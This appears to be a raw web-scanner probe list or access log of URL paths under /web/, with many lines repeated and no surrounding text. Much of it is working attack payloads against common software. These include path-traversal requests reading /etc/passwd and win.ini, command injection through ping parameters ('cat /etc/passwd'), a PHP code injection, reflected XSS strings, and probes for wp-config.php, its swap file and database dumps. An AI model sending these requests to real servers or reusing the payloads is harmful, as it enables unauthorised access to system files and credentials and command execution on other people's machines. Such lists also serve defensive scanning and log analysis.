/web/download.php?file=/etc/passwd
/web/cgi-bin/status
/web/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd
/web/index.php?g=g&m=Door&a=index&content=<?php%20phpinfo();
/web/wp-content/plugins/bbpress/
/web/wp-content/plugins/1-flash-gallery/
/web
/web//netcore_get.cgi
/web/login.php
/web/QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx
/web/casmain.xgi
/web/v1/submissions
/web/wp-content/backup-db/
/web/wp-content/themes/prostore/go.php?https://example.com/
/web/wp-content/themes/altair/modules/
/web/api/downloads?fileName=../../../../../../../../etc/passwd
/web/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd
/web
/web/wp-config.php
/web/cgi-bin/slogin/login.py
/web/db_dump.php
/web/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E
/web/OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('24s4earAkcPDVwwSlO75VJb3k97')%3E
/web/MUP/
/web/http/index.php
/web/blog/wp-content/plugins/1-flash-gallery/
/web/OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('24s4earAkcPDVwwSlO75VJb3k97')%3E
/web/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('24s4earAkcPDVwwSlO75VJb3k97')%3E
/web/_users/_all_docs
/web/v1/submissions
/web/wp-content/backup-db/
/web/wp-content/themes/prostore/go.php?https://example.com/
/web/wp-content/themes/altair/modules/
/web/api/downloads?fileName=../../../../../../../../etc/passwd
/web/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd
/web/.wp-config.php.swp
/web/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa
/web/cgi-bin/slogin/login.py
/web/db_dump.php
/web/MUP/
/web/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E
/web/http/index.php
/web/blog/wp-content/plugins/1-flash-gallery/
/web/?{alert(1)}
/web/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/
/web/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp
/web/cgi-bin/operator/fileread?READ.filePath=/etc/passwd
/web/wp-content/themes/altair/functions/
/web/index.php
/web/_users/_all_docs
/web/http/index.php
/web/.wp-config.php.swp
/web/script/
/web/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa
/web/auth/realms/master/clients-registrations/openid-connect
/web/search.php?searchtype=5
/web/?{alert(1)}
/web/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp
/web/cgi-bin/operator/fileread?READ.filePath=/etc/passwd
/web/wp-content/themes/altair/functions/
/web/index.php
/web/manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../poc.txt&id=1
/web/lcms/index.php
/web/wp-json/oembed/1.0/proxy?url=http:///
/web/portal/info.jsp
/web/mifs/j_spring_security_check
